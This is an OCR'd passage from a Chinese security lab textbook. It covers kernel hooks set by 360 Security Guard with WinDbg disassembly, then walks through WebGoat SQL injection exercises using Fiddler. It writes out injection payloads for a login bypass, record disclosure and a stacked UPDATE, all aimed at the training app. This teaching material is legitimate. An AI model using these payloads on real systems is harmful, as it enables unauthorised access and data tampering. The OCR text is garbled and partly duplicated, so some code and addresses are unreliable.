842528ee 0f954512 setne byte ptr [ebp + 12h] 
842528f2 0f858c030000 jne nt! KiServiceExit2 + 0x17b (84252c84) 
842528f8 ffd3 call ebx; // 调 用 服务 例 程 ,如 nt! NtReadFile 


当 安 装 了 360 后 ,上 面 的 5 个 机 器 码 2B El C1 E9 02, 被 修改 为 es9d7a81903 , 即 ; 


842598b4 e9d7a81903 jmp 873£4190 


实践 教程 


0x8447fec8 即 是 存储 在 内 存 地 址 0x8429A920 上 的 函数 地 址 。 
© 输入 命令 “ln 8447fec8”, 输 出 “(8447fec8)nt!NtReadFile”。 
ZwWiriteFile() 函 数 从 一 个 叫 UserSharedData 结构 区 域 里 得 到 KiFastSystemCall( O 函 


数 地 址 值 。 在 User 层 和 Kernel 层 分 别 定义 了 一 个 _KUSER_SHARED_DATA 结构 区 域 
(UserSharedData) ,用 于 User 层 和 Kernel 层 共享 某 些 数据 ,在 sysenter 快速 切入 机 制 里 就 


使 用 


了 这 个 区 域 。User 层 地 址 为 0x7ffe0000; Kernnel 层 地 址 为 0xffdf0000。 用 “dt 


_KUSER_SHARED _DATA” 在 偏 移 地 址 为 0x300 处 的 是 SystemCall, 而 0x304 是 


Syst 


emCallReturn, 


(2) 输入 指令 : kd> u ntdll! KiFastSystemCall。 


地 址 机 器 码 汇编 指令 
77a27090 8bd4 mov edx, esp 
77a27092 0f34 sysenter 


ntdll! KiFastSystemCall 使 用 sysenter 指令 快速 切 和 人 到 内 核 的 nt!KiFastCallEntry() 代 


码 里 。 


(3) 输入 指令 : kd> u nt!KiFastCallEntry 十 0xd7。 
842598a733c9 Xorecx, eCX 
842598a9 8b570cmovedx, dword ptr [edi + 0Ch]; //edi 指向 SSDT 或 ShadowSSDT 
842598ac 8b3f mov edi, dword ptr [edi] 
842598ae 8a0c10 mov cl,byte ptr [eax+ edx]; //cl 得 到 参数 的 长 度 , 即 参数 个 数 * 4 
842598b1 8b1487 mov edx,dword ptr [edi + eax * 4]; 

//eax 是 服务 号 ,然后 ebx 得 到 服务 函数 地 址 
842528b4 2bel Sub esp,ecx; //ecx 得 到 参数 的 总 长 度 , 这 里 是 开辟 栈 空 间 
842528b6 cle902 shr ecx,2 // 除 以 4, 得 参数 个 数 
842598b9 Bbfc mov edi,esp 


842598bb 3b354c683884 cmp esi,dword ptr [nt!MmUserProbeAddress ] 

842528bb 3b354cf83784 cmp esi,dword ptr [nt!MmUserProbeAddress (8437f84c)] 
842528c1 0f832e020000 jae nt!KiSystemCallExit2 + 0xa5 (84252af5) 

842528c7 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 

842528c9 f6456c01 test byte ptr [ebp + 6Ch],1 

842528cd 7416je nt! KiFastCallEntry + 0x115 (842528e5) // 跳 转 


(4) 输入 指令 : kd> u 842528e5。 


nt! KiFastCallEntry + 0x115: 

842528e5 8bda mov ebx, edx 

842528e7 f60588c6348440 test byte ptr [nt!PerfGlobalGroupMask + 0x8 (8434c688) 
],40h 


842528ee 0f954512 setne byte ptr [ebp + 12h] 
842528f2 0f858c030000 jne nt! KiServiceExit2 + 0x17b (84252c84) 
842528f8 ffd3 call ebx; // 调 用 服务 例 程 ,如 nt! NtReadFile 


当 安 装 了 360 后 ,上 面 的 5 个 机 器 码 2B El C1 E9 02, 被 修改 为 es9d7a81903 , 即 ; 


842598b4 e9d7a81903 jmp 873£4190 


被 360 修改 为 一 个 跳 转 ,也 即 设置 了 一 个 内 核 钩子 (inline HF, AKT) 
图 11-10 所 示 为 用 XueTr 工具 显示 未 安装 360 安全 卫士 的 系统 时 的 内 核 钩 子 。 图 11-11 
所 示 为 用 XueTr 工具 显示 安装 360 安全 卫士 后 的 内 核 钩子 。 


进程 | 驱动 模块 | 内 校内 核 网 子 | 应 用 层 鬼子 | 网 络 | 注册 表 | 文件 | 启动 顺 | 服务 | 系统 杂 硕 | 电脑 体检 | ma 
SSDT |shadowssDT|FsD | 键盘 | f [pisk |] Atapi | Acpi | sesi 内 核 沟 子 |0bject 鬼 子 | 系统 中 断 表 | 
H: [nta | 钧 子 类 型 挂钩 处 当前 挂 沟 处 原始 人 


06 05 
EO OF BA FO O... D8 OF 22 D8 C... 
84 8D 6F CO C... 95 27 DA BD 3... 


len(28) [pasnth sys] Inline 


图 11-10 未 安装 360 安全 卫士 的 内 核 钩子 


W 驱动 模块 | 8 AEAF GmEm+]IF8s “| 注册 表 | 文件 启动 珊 | 服务 | 系统 杂项 | 电脑 体检 mm [XF T 
SSDT | shadowssDT | PSD 。 | 键盘 | 良 标 “| Disk | Atapi | Aepi | scsi — 30899 objecti | 系统 中 疡 表 | 


挂 沟 处 原始 人 


A ži $ 
len(1) RtlPrefetcWlemoryNonT enpor al [. c3 
t 15 1B 03 2B El Cl E9 02 


4 
OF BA FO 0... D8 OF 22 D8 C. 
6E 


[0x842B44EF]->[-] Inl. C3 
[Du844BB0F3]->[0x89536EB4][C \Wi Tat 53 89 F3 60 4B 84 
—.A. = — s 


图 11-11 安装 360 安全 卫士 的 内 核 钩子 


内 核 钩子 的 恢复 步骤 如 下 。 

O 从 内 存 地 址 842527d0(ln nt! KiFastCallEntry) 开 始 的 内 存 空间 中 ,搜索 特征 机 器 
码 8b570c8b3f8a0c10( 被 修改 处 前 面 的 机 器 码 ) 。 

© 找到 特征 机 器 码 , 即 可 定位 到 挂钩 处 ,检查 后 续 的 5 个 机 器 码 是 否 为 2B El C1 E9 
02 ,如 果 不 是 则 将 其 改过 来 即 可 。 

在 XueTr 工具 中 恢复 该 处 的 内 核 钩子 ,360 会 很 快 又 改过 来 ,说 明 它 有 个 内 核 工 作 线程 
不 断 地 监视 这 个 位 置 。 

图 11-11 中 ,360 还 挂钩 了 KeUserModeCallback, 这 里 的 内 核 钩子 称 为 IAT (Import 
Address Table, 导 和 人 地 址 表 ) 钧 子 ,QQ 电脑 管家 也 用 IAT 钩子 拦截 KeUserModeCallback， 
有 些 版 本 的 360 也 用 inline HF. Ë 11-12 显示 函数 KeUserModeCallback 存在 于 内 核 文 
fE win32. sys 的 依赖 模块 NTOSKRNL. EXE 中 , 即 IAT 表 中 ,360 在 内 存 中 修改 了 该 IAT 
表 中 KeUserModeCallback 函数 地 址 。 输 入 “ln 844b60f3” 显 示 “nt! KeUserModeCallback” 
信息 。 


E- 日 WIN32K SYS Ordinal ^ | Hint Function Entr 
日 -日 NTOSKRNLEXE N/A 924 (0x039C) | KeTickCount Not 

申 - 日 PSHED.DUL NA 927 (0039F) Not 

H- 国 HALDLL RE 930 (0x03A2) lback Not) 

由 -日 aoorvpou =m |NA 931 (0 3A3) | KeWaitForMultpleObiects Not 


图 11-12 win32. sys 的 依赖 模块 


6. 思考 题 


(1) 有 些 软 件 的 安装 需 判断 操作 系统 版 本 ,而 有 些 不 需要 ,请 说 明 原理 。 
(2) 360 安全 卫士 禁止 Hookport. sys 驱动 被 手工 务 载 ,请 说 明 利 灿 。 


112 SQL 注入 


1. 实践 目的 
了 解 Web 应 用 表单 处 理 流程 ,理解 SQL 注入 漏洞 的 原理 。 
2. 实践 环境 


A) j£ À Internet 的 计算 机 一 台 ,安装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 
(2) 实践 工具 : 具有 漏洞 的 Web 服务 器 (WebGoat) ,Fiddler。 


3. 名 词 解释 


(1) SQL: 结构 化 查询 语言 (Structured Query Language) 的 简称 。 
结构 化 查询 语言 是 一 种 数据 库 查 询 和 程序 设计 语言 ,用 于 存 取 数 据 以 及 
查询 .更 新 和 管理 关系 数据 库 系 统 。SQL 语句 用 于 取 回 和 更 新 数据 库 中 
的 数据 。SQL 可 与 数据 库 程序 协同 工作 , 比如 MS Access、DB2、 
Informix, MS SQL Server ,Oracle .Sybase 以 及 其 他 数据 库 系统 。 

(2) 提 权 : 提高 自己 在 服务 器 中 的 权限 ,主要 针对 网 站 入 侵 过 程 中 。 
当 入 侵 某 一 网 站 时 ,通过 各 种 漏洞 提升 WebShell 权限 以 获得 更 改 服务 
器 的 权限 。 

(3) 网 站 漏洞 : 漏洞 是 指 一 个 系统 存在 的 弱点 或 缺陷 ,系统 对 特定 
威胁 ,攻击 或 危险 事件 的 敏感 性 ,或 进行 攻击 的 威胁 作用 的 可 能 性 。 漏 
洞 可 能 来 自 应 用 软件 或 操作 系统 设计 时 的 缺陷 或 编码 时 产生 的 错误 ,也 
可 能 来 自 业 务 在 交互 处 理 过 程 中 的 设计 缺陷 或 逻辑 流程 上 的 不 合理 之 
处 。 在 Web 应 用 中 ,例如 没有 对 用 户 的 输入 数据 或 者 是 页 面 中 所 携带 的 
信息 (如 Cookie) 进 行 必 要 的 合法 性 判断 ,导致 了 攻击 者 可 以 利用 这 个 编 
程 漏洞 来 人 侵 数据 库 或 者 攻击 Web 应 用 程序 ,由 此 获得 一 些 重要 的 数据 
和 利益 。 


4. 预备 知识 


1) HTTP 超 文本 传输 协议 
HTTP(HyperText Transfer protocol, 超 文 本 传输 协议 ) 是 访问 


WWW 的 核心 通信 协议 , 它 是 一 种 基于 消息 的 模型 , 即 客户 端 发 送 一 条 请 求 消息 ,而 后 由 服 
务 器 返回 一 条 响应 消息 。 此 协议 基本 上 不 需要 连接 ,HTTP 使 用 TCP 协议 作为 它 的 传输 
协议 ,但 每 次 请 求 和 响应 都 是 自动 完成 ,并 且 可 能 使 用 不 同 的 TCP 连接 。HTTP 报 文 分 为 
两 种 ,从 Web 客户 端 发 往 Web 服务 器 的 报 文 称 为 HTTP 请 求 报 文 ,从 服务 器 发 往 客户 端 
的 报 文 称 为 响应 报 文 。Web 浏览 器 与 Web 服务 器 之 间 将 完成 下 列 7 个 步骤 。 

(1) 建立 TCP 连接 。 

在 HTTP 工作 开始 之 前 ,Web 浏览 器 首先 要 通过 网 络 与 Web 服务 器 建立 连接 ,该 连接 
是 通过 TCP 来 完成 的 。HTTP 是 比 TCP 更 高 层次 的 应 用 层 协 议 ,根据 规则 ,只 有 低层 协 
议 建立 之 后 才能 进行 高 层 协议 的 连接 ,因此 ,首先 要 建立 TCP 连接 ,一 般 TCP 连接 的 端口 
号 是 80 或 8080。 

(2) Web 浏览 器 向 Web 服务 器 发 送 请 求 命令 。 

一 旦 建立 了 TCP 连接 ,Web 浏览 器 就 会 向 Web 服务 器 发 送 请 求 命令 。 例 如 : 

GET/sample.jsp HTTP/1. 1。 其 中 ,GET 代表 请 求 方 法 ; /sample. jsp 表示 URI, 即 
Web 服务 器 上 的 网 页 文件 sample. jsp; HTTP/1. 1 代表 协议 和 协议 的 版 本 。 

(3) Web 浏览 器 发 送 请 求 头 信息 。 

浏览 器 发 送 其 请 求 命令 之 后 ,还 要 以 头 信息 的 形式 向 Web 服务 器 发 送 一 些 别 的 信息 ， 
之 后 浏览 器 发 送 了 一 空白 行 来 通知 服务 器 , 它 已 经 结束 了 该 头 信息 的 发 送 。 

(4) Web 服务 器 应 答 。 

客户 机 向 服务 器 发 出 请 求 后 ,服务 器 会 客户 机 回 送 应答 : 


HTTP/1.1 200 OK 


应 答 的 第 一 部 分 是 协议 的 版 本 号 和 应 答 状 态 码 。 

(5) Web 服务 器 发 送 应 答 头 信息 。 

正如 客户 端 会 随同 请 求 发 送 关 于 自身 的 信息 一 样 ,服务 器 也 会 随同 应 答 向 用 户 发 送 关 
于 它 自 己 的 数据 及 被 请 求 的 文档 。 

(6) Web 服务 器 向 浏览 器 发 送 数据 。 

Web 服务 器 向 浏览 器 发 送 头 信息 后 , 它 会 发 送 一 个 空白 行 来 表示 头 信 息 的 发 送 到 此 为 
结束 ,接着 , 它 就 以 Content-Type 应 答 头 信息 所 描述 的 格式 发 送 用 户 所 请 求 的 实际 数据 。 

(7) Web 服务 器 关闭 TCP 连接 。 

HTTP 报 文 都 是 纯 文本 ,不 是 二 进 制 代码 ,所 以 可 以 进行 方便 的 读 写 和 编辑 , HTTP 报 
文 由 以 下 三 部 分 组 成 。 

O 起 始 行 : 报 文 的 第 一 行 就 是 起 始 行 ,在 请 求 报 文 中 用 来 说 明 要 做 些 什么 ,在 响应 报 
文中 说 明 出 现 了 什么 情况 。 

O 首部 字段 : 起 始 行 后 面 有 零 个 或 多 个 首部 字段 。 每 个 字段 都 包含 一 个 名 字 和 一 个 
值 ,二 者 之 间 用 冒号 (: ) 来 分 隔 , 首 部 以 一 个 空 行 结束 。 请 求 头 (Request Header) 包 含 许 多 
有 关 的 客户 端 环 境 和 请 求 正 文 的 有 用 信息 ,例如 。 请 求 头 可 以 声明 浏览 器 所 用 的 语言 ,请求 
正文 的 长 度 , 所 接受 的 文档 格式 等 。 

© 主体 : 空 行 之 后 就 是 可 选 的 报 文 主体 .包含 了 所 有 类 型 的 数据 。 请 求 主体 包含 要 发 
送 给 Web 服务 器 的 数据 ,而 相应 主体 则 装载 了 要 返回 给 服务 端的 数据 。 


实践 教程 


典型 的 HTTP 报 文 的 请 求 报 文 头 (Request Header) 如 下 。 


GET/sample. jspHTTP/1.1 

Rccept: image/gif. image/jpeg, * / * 
Accept - Language:zh — cn 
Connection:Keep — Alive 

Host :1localhost 

Accept - Encoding:gzip, deflate 


username = jinqiao&password = 1234 


典型 的 HTTP 报 文 的 响应 报 文 头 (Response Header) 如 下 。 


HTTP/1.1 200 OK // 请 求 成 功 

Date: Thu, 08 Mar 200707:17:51 GMT 
Connection: Keep - Alive 

Content - Length: 23330 

Content - Type: text/html 

Cache - contro1: private 


Hi!I'm a message 


响应 报 文 头 中 的 200 是 HTTP 应 答 码 ,也 称 为 状态 码 , 它 反映 了 Web 服务 器 处 理 
HTTP 请 求 状态 。 
HTTP 应 答 码 由 3 位 数字 构成 ,其 中 首位 数字 定义 了 应 答 码 的 类 型 。 
名 1XX: 信息 类 (Information) ,表示 收 到 Web 浏览 器 请 求 ,正在 进一步 的 处 理 中 。 
名 2XX: 成 功 类 (Successful) ,表示 用 户 请 求 被 正确 接收 ,理解 和 处 理 , 例 如 200 OK. 
名 3XX: 重 定向 类 (Redirection) ,表示 请 求 没有 成 功 ,客户 必须 采取 进一步 的 动作 。 
避 4XX: 客户 端 错 误 (Client Error), 表 示 客 户 端 提 交 的 请 求 有 错误 ,例如 404 
NOTFound, 意 味 着 请 求 中 所 引用 的 文档 不 存在 。 
名 5XX: 服务 器 错误 (Server Error) ,表示 服务 器 不 能 完成 对 请 求 的 处 理 , 如 500。 
Web 请 求 中 和 数据 库 联系 较为 紧密 的 是 表单 ,表单 在 网 页 中 主要 负责 数据 采集 功能 。 
一 个 表单 有 3 个 基本 组 成 部 分 。 
忌 表 单 标签 : 这 里 面包 含 了 处 理 表单 数据 所 用 CGI 程序 的 URL 以 及 数据 提交 到 服务 
器 的 方法 。 
z KM. 包含 了 文本 框 ,密码 框 、 隐 藏 域 .多 行文 本 框 \ 复 选 框 , 单 选 框 、 下 拉 选 择 框 和 
文件 上 传 框 等 。 
名 表单 按钮 : 包括 提交 按钮 .复位 按钮 和 一 般 按钮 .用 于 将 数据 传送 到 服务 器 上 的 CGI 
脚本 或 者 取消 输入 ,还 可 以 用 表单 按钮 来 控制 其 他 定义 了 处 理 脚 本 的 处 理工 作 。 
2) SQL 注 入 
SQL 语言 基本 上 独立 于 数据 库 本 身 、 使 用 的 机 器 、 网 络 、 操 作 系 统 ,基于 SQL 的 DBMS 
产品 可 以 运行 在 从 个 人 机 工作 站 到 基于 局 域 网 、 小 型 机 和 大 型 机 的 各 种 计算 机 系统 上 , 具 
有 良好 的 可 移植 性 。 图 12-1 所 示 为 Web 网 络 数据 处 理 流程 。 


提出 请 求 _[ Web | 数据 库 
[RM 形式 | 浏览 器 返回 结果 | _ 服 务 器 | 数据 库 


图 12-1 Web 网 络 访问 


Web 服务 器 对 外 提供 包含 表单 的 Web 页 面 作为 访问 接口 ,查询 结果 也 以 包含 数据 列 
表 的 Web 页 面 形式 返回 给 用 户 。 其 中 数据 请 求 就 是 向 数据 库 发 出 SQL 查询 。 例 如 数据 库 
中 存在 某 一 数据 表 book 包含 所 有 书籍 的 信息 ,浏览 器 提交 Web 表单 要 查询 ( Windows 
2000 网 络 管理 ) 一 书 的 信息 , 则 该 数据 请 求 转化 为 以 下 SQL 语句 。 


SELECT * FROM book WHERE book name = 'Windows 2000 网 络 管理 ' 


SQL 注 和 (SQL Injection) 是 通过 构建 特殊 的 输入 作为 参数 传人 Web 应 用 程序 的 ,而 
这 些 输入 大 都 是 SQL 语法 里 的 一 些 组 合 , 通 过 执行 SQL 语句 进而 执行 攻击 者 所 要 的 操作 ， 
其 主要 原因 是 程序 没有 细致 地 过 滤 用 户 输入 的 数据 ,致使 非法 数据 侵入 系统 。 有 具体 来 说 ,将 
恶意 SQL 命令 注入 到 后 台数 据 库 引擎 执行 的 能 力 , 它 可 以 通过 在 Web 表单 中 输入 恶意 
SQL 语句 得 到 一 个 存在 安全 漏洞 的 网 站 上 的 数据 库 , 而 不 是 按照 设计 者 意图 去 执行 SQL 
语句 。 

假设 在 浏览 器 中 输入 URLCUniform Resoure Locator, 统 一 资源 定位 器 ,WWW 页 的 地 
址 ) 为 “www. sample. com” 时 ,由 于 它 只 是 对 页 面 的 简单 请 求 .无须 对 数据 库 进行 动态 请 求 ， 
所 以 它 不 存在 SQL Injection, 当 输入 "www. sample. com?testid 二 23” 时 , 则 在 URL 中 传递 
变量 testid, 并 且 提 供 值 为 23 ,由 于 它 是 对 数据 库 进 行动 态 查 询 的 请 求 (其 中 ?testid 一 23” 
表示 数据 库 查 询 变量 ) ,可 以 在 该 URL rhik A EE SQL 语句 。 


5. 实践 操作 及 步骤 


1) 安装 实践 工具 

(1) Fiddler。 

Fiddler(http://www. telerik. com/fiddler) 是 一 个 HTTP 协议 调试 代理 工具 , 它 能 够 
记录 并 检查 所 有 计算 机 和 Internet 之 间 的 HTTP 通信 ,设置 断 点 ,查看 所 有 的 “进出 ” 
Fiddler 的 数据 (包括 cookie、html\js、css 等 文件 ) ,也 可 以 将 数据 修改 后 再 “进出 ”。 

(2) WebGoat。 

WebGoat 是 OWASP 组 织 研 制 出 的 用 于 进行 Web 漏洞 实践 的 应 用 平台 ,用 来 说 明 
Web 应 用 中 存在 的 安全 漏洞 。WebGoat 运行 在 带 有 Java 虚拟 机 的 平台 之 上 ,当前 提供 的 
训练 课程 有 30 多 个 ,其 中 包括 跨 站 点 脚本 攻击 (XSS) ,访问 控制 线程 安全 ,操作 隐藏 字段 、 
操纵 参数 、 弱 会 话 cookie, SQL 盲 注 、 数 字 型 SQL 注入 .字符 串 型 SQL i A. Web 服务 、 
Open Authentication 失效 .危险 的 HTML 注释 等 。 

进入 WebGoat 官网 https://code. google. com/p/webgoat/downloads/list, 选择 : 
WebGoat-5. 4-OWASP_Standard_ Win32. zip. 
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需要 注意 的 是 ,在 WebGoat version 5 之 后 ,就 不 需要 自己 下 载 安装 Java 环境 以 及 
Tomcat 了 ,它们 被 内 嵌 到 WebGoat 里 面 ,如 果 下 载 的 是 5 之 前 的 版 本 ,还 需要 自己 配置 
Java 环境 和 Tomcat。 打 开 WebGoat 安装 目录 ,如 图 12-2 所 示 。 


名 称 修改 日 期 == 大 小 

Ji java 2014/2/3 18:46 KHS 

JÌ tomcat 2014/2/3 18:46 KS 

[E README.bt 2012/4/26 1310 。 文本 文档 8 KB 
图 webgoat.bat 2012/4/20 22:18 Windows 批 处 理 ..… 1KB 
Ll webgoat.sh 2012/4/20 22:18 SH 文件 2 KB 
图 webgoat 8080.bat 2012/4/20 22:18 ` Windows 批 处 理 .. 1KB 


图 12-2 WebGoat 安装 目录 


双击 WebGoat. bat, 出现 DOS 界面 表示 Tomcat 服务 器 正在 启动 。 启 动 成 功 后 即 可 以 
访问 实践 环境 ,通过 浏览 器 访问 http: //localhost/WebGoat/attack 进入 主 界面 ,这 里 的 目 
录 中 WebGoat 是 大 小 写 敏 感 的 ,访问 时 需要 注意 。 身 份 验证 用 户 名 为 guest, 密 码 为 guest， 
验证 登录 。 主 界面 如 图 12-3 所 示 。 
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图 12-3 WebGoat 主 界面 


选择 SQL 注入 实践 LAB:SQL Injection ,如 图 12-4 所 示 。 

2) FPR SQL 注入 

目标 : 使 用 SQL 注入 绕 过 密码 认证 。 具 体 步 又 如 下 。 

Q) 启动 Fiddler, ËI 12-5 所 示 为 Fiddler 主 界面 , 左 侧 栏 显 示 当 前 计算 机 正在 进行 
Web 连接 的 所 有 HTTP 数据 包 信息 , 右 侧 栏 显示 被 选中 HTTP 数据 包 的 详细 内 容 。 
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Access Control Flaws 

AJAX Secur Stage 2 

Authentication Flaws Stage 2: Block SQL Injection using a Parameterized Query. 

Buffer Overflows 

Code Quakty THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT 
currency 

Cross-Site Scripting Implement a fix to block SQL injection into the fields in question on the Login page. 

(XSS) Repeat stage 1. Verify that the attack is no longer effective. 

improper Error Handling 

Injection Flaws 


Command Injection 


Log Spoofing 
XPATH Injection 


12-4 LAB:SQL Injection 界面 


Fidder Web Debugger ” "" v 
Ele gdt Bues ool Yew Help GET /book 
E) ty Replay X- b Go |$ Stream H Decode enamin ee ñm: ' 


图 12-5 Fiddler 主 界面 


设置 本 地 计算 机 访问 网 站 的 规则 ,使 所 有 访问 请 求 被 Fiddler 拦截 , 当 手 动 单 击 绿色 三 
角形 Go 按钮 时 , 才 会 将 请 求 发 送出 去 , 即 当 请 求 未 发 送 前 ,通过 Fiddler 可 以 对 HTTP 请 
求 报 文 进行 修改 。 设 置 方法 : 执行 菜单 Rules>Automatic Breakpoints>Before Request, 

(2) 图 12-6 所 示 为 Stage 1:String SQL Injection 界面 登录 ,以 用 户 Neville 登录 ,确保 


g Goat Hills Financial 


Human Resources 


[i <) 


图 12-6 登录 
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Fiddler 已 经 启动 ,在 不 知道 用 户 Neville 的 正确 密码 情况 下 任意 输入 一 个 密码 “12”, 然 后 单 
击 Login 按钮 。 


此 时 Fiddler 已 经 拦截 请 求 ,在 Fiddler 的 Password 中 修改 密码 为 “smith' OR'1' 一 '1”, 如 
图 12-7 所 示 , 图 中 employee_id 值 为 112 ,是 用 户 Neville 的 id( 数 值 型 ) 。 


过 后 


| D] Fiters | 日 og | 三 mmeine| 


AutoResponder | 可 Composer | <5 Fiddersaipt | 口 Fiters T 
WebForms | HexView | Auth | Cookes | Raw | NON | XM | 
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单 击 Go 按钮 ,网 站 已 经 以 Neville 身份 登录 成 功 ,可 以 查看 和 修改 删除 员工 ,如 图 12-8 
所 示 。 


¿“ Goat Hills Financial 


Human Resources 
š Welcome Back Neville - Staff Listing Page = ] 


Felect from the list below 


Eric Walker (employee) [ViewProti, 
eny Mosse n [CreateProfie ] 


图 12-8 管理 页 面 


正常 情况 下 ,如 图 12-6 所 示 的 登录 请 求 会 被 Web 服务 器 转换 为 如 下 的 SQL 查询 
语句 。 


SELECT * FROM users WHERE employee_id = 112 and password = '12' 


其 中 数据 表 users 包含 所 有 账户 和 密码 的 数据 ,登录 名 是 正确 的 但 密码 是 错误 的 ,因此 
查询 的 结果 为 空 , 返 回 认 证 失败 。 而 Fiddler 已 经 拦截 请 求 并 修改 Password 后 ,“smith' OR 


T= PERAI”. W SQL 查询 语句 如 下 。 


SELECT * FROM users WHERE employee id = 112 and password = 'smith'OR '1' = '1' 


SQL 的 查询 条 件 由 原来 的 两 个 逻辑 与 条 件 ( 真 X 假 ==1X0=0, 结 果 为 假 ) , 变 成 了 3 个 
条 件 , 其 中 “'1' 二 '1'" 便 真 ,逻辑 或 使 判断 公式 为 “ 真 X 假 十 真 二 1X0 十 1 二 1”, 结 果 为 真 , 因 
此 返回 认证 成 功 并 返回 管理 页 面 。 

3) 数字 型 SQL 注入 

目标 : 执行 SQL 注入 绕 过 认证 ; 通过 注入 语句 ,浏览 到 原本 无 法 浏览 的 信息 。 通 过 一 
个 普通 员工 的 账户 浏览 其 BOSS 的 账户 信息 。 具 体 步骤 如 下 。 

(1) 以 “Larry” 身 份 (employee_id 二 101) 和 密码 “larry” 登 录 , 进 入 WebGoat 的 stage3, 
浏览 员工 信息 的 按钮 是 ViewProfile, 如 图 12-9 所 示 。 


Solution Videos Restart this Lesson| 


Er 3: Execute SQL Injection t to bypass authorization. 
As regular employee Larry, use SQL injection into a parameter of the View function 
(from the List Staff page) to view the profle of the boss (Neville). 


< 
Human Resources 
$ Welcome Back Larry - Staff Listing Page 


Belect from the list below 
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(2) 启动 Fiddler 后 , 单 击 ViewProfile 按钮 ,Fiddler 左 侧 栏 显 示 HTTP 报 文 包 信息 ,对 
HTTP 报 文 包 进行 分 析 , 如 图 12-10 所 示 。 

由 ViewProfile 请 求 转换 的 SQL 查询 是 以 员工 employee_id 作为 索引 ,返回 该 员工 的 
信息 如 First name, Last name、salary、Phone 等 ,如 图 12-11 所 示 ,数据 库 中 存在 一 个 或 多 个 
数据 表 存 储 员工 相关 信息 . 即 可 能 是 单 表 查询 也 可 能 是 多 表 查 询 , 这 个 具体 可 以 不 必 关 心 ,只 
需 了 解 查询 条 件 和 返回 结果 。 假 设 单 表 查 询 , 表 名 为 employees, 则 SQL 查询 语句 如 下 。 


SELECT * FROM employees WHERE employee_id = 101 


则 返回 用 户 Larry 的 记录 (有 且 仅 有 一 条 记录 。Web 服务 器 只 会 将 SQL 查询 返回 的 第 
一 条 记录 发 送 给 客户 浏览 器 以 网 页 的 形式 显示 ,如 图 12-11 所 示 )。 如 果 将 employee_id 转 
换 成 其 他 如 102, 则 返回 错误 信息 如 图 12-12 所 示 ,说 明 不 存在 employee_id 为 102 的 员工 。 


Name 
WE- 
meru 
* 
Vake. 
101 
action ViewProfie 
* 
WUUImI TU JE WF 
Transformer | Headers | TextView | SyntaxView | ImageView | HexWew | WebView | Auth Cading | Cookies | Raw 


图 12-10 Fiddler 拦截 ViewProfile 请 求 


z You have completed Stage 3: Numeric SQL Injection. 
Welcome to Stage 4: Parameterized Query # 
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First Name: Neville Last Name: Bartholomew 
Street: ee City/State: San Jose, CA 
Phone: 408-587-0024 Start Date: 3012000 
SSN: 111-111-1111 Salary: 450000 
Credit Card: 4803389267684109 Credit Card Limit: 300000 
Comments: Manager: 112 
Disciplinary Disciplinary Action 112005 
Explanation: Dates: 


图 12-11 Neville 的 账户 信息 


g Goat Hills Financial 
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数字 型 SQL 注入 即 蔡 换 掉 101, 在 如 图 12-10 中 所 示 的 employee_id 栏 输入 “101 or 
1=1 order by salary desc”, W) SQL 查询 语句 变 为 


SELECT * FROM employees WHERE employee id= 101 or 1=1 order by salary desc 


SQL 的 查询 条 件 由 原来 的 一 个 条 件 变 成 了 两 个 条 件 之 间 的 逻辑 或 ,其 中 “1 — 1" 恒 真 ， 
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* 
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action ViewProfie 
* 
WUUImI TU JE WF 
Transformer | Headers | TextView | SyntaxView | ImageView | HexWew | WebView | Auth Cading | Cookies | Raw 


图 12-10 Fiddler 拦截 ViewProfile 请 求 


z You have completed Stage 3: Numeric SQL Injection. 
Welcome to Stage 4: Parameterized Query # 


Human Resources 


‘t Goat Hills Financial 
ih Welcome Back Larry = 
First Name: Neville Last Name: Bartholomew 
Street: ee City/State: San Jose, CA 
Phone: 408-587-0024 Start Date: 3012000 
SSN: 111-111-1111 Salary: 450000 
Credit Card: 4803389267684109 Credit Card Limit: 300000 
Comments: Manager: 112 
Disciplinary Disciplinary Action 112005 
Explanation: Dates: 


图 12-11 Neville 的 账户 信息 
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数字 型 SQL 注入 即 蔡 换 掉 101, 在 如 图 12-10 中 所 示 的 employee_id 栏 输入 “101 or 
1=1 order by salary desc”, W) SQL 查询 语句 变 为 


SELECT * FROM employees WHERE employee id= 101 or 1=1 order by salary desc 


SQL 的 查询 条 件 由 原来 的 一 个 条 件 变 成 了 两 个 条 件 之 间 的 逻辑 或 ,其 中 “1 — 1" 恒 真 ， 


因此 查询 条 件 恒 真 , 返 回 的 结果 包括 所 有 员工 的 记录 ,由 于 网 页 只 能 显示 第 一 条 记录 ,其 中 
order by salary desc 表示 返回 记录 以 薪水 递减 来 排序 ,这 样 薪水 最 高 的 记录 排 在 第 一 条 记 
录 上 而 被 显示 出 来 ,用 社会 工程 学 解释 BOSS 的 薪水 最 高 ,这样 就 可 以 实现 通过 一 个 普通 账 
户 “Larry” 而 浏览 其 BOSS*Neville” 的 账户 信息 ,如 图 12-10 所 示 。 

4) SQL 注入 修改 数据 

目标 : 通过 SQL 的 方式 修改 userid 为 jsmith 的 员工 的 薪水 。 

图 12-13 所 示 的 页 面 表示 通过 输入 用 户 userid 来 查看 其 对 应 用 户 的 薪水 信息 (来 自 
salaries 表 ) 。SQL 查询 语句 变 为 : 


SELECT salary FROM salaries WHERE userid id= 'jsmith' 


查询 结果 显示 在 页 面 中 SALARY 下 的 文本 框 中 ,如 果 该 表单 后 台 处 理 程序 存在 字符 
串 型 SQL 注入 漏洞 , 则 可 以 修改 该 员工 的 薪水 。 


he form below allows a user Cm he g a a 
aare), Ths Or ee o Sirno i In order to pass 


SQL Injection to modify the salary for userid jsmith. 
enter your seorit rat) 
USERID SALARY 


jsmith _ 9999999 


12-13 工资 信息 查询 网 页 


SQL 语句 中 对 已 有 数据 的 修改 使 用 UPDATE 命令 ,如 果 修 改 表 salaries 中 用 户 id 为 
jsmith 的 薪水 salary 字段 为 新 值 999999 ,使 用 如 下 命令 。 


UPDATE salaries SET salary = 999999 WHERE userid = 'jsmith' 


其 中 WHERE? 后 面 的 语句 表示 查询 条 件 ,表示 在 表 salaries 中 所 有 满足 该 条 件 记录 
的 salary 字段 值 更 新 为 999999, 对 不 满足 条 件 的 记录 不 影响 。 图 13-12 中 所 示 的 表单 只 是 
用 于 查询 而 不 是 更 新 ,在 Fiddler PIER Go HRR. HE userid 的 栏 输入 以 下 语句 。 


someuserid'; UPDATE salaries SET salary = 999999 WHERE userid = 'jsmith 


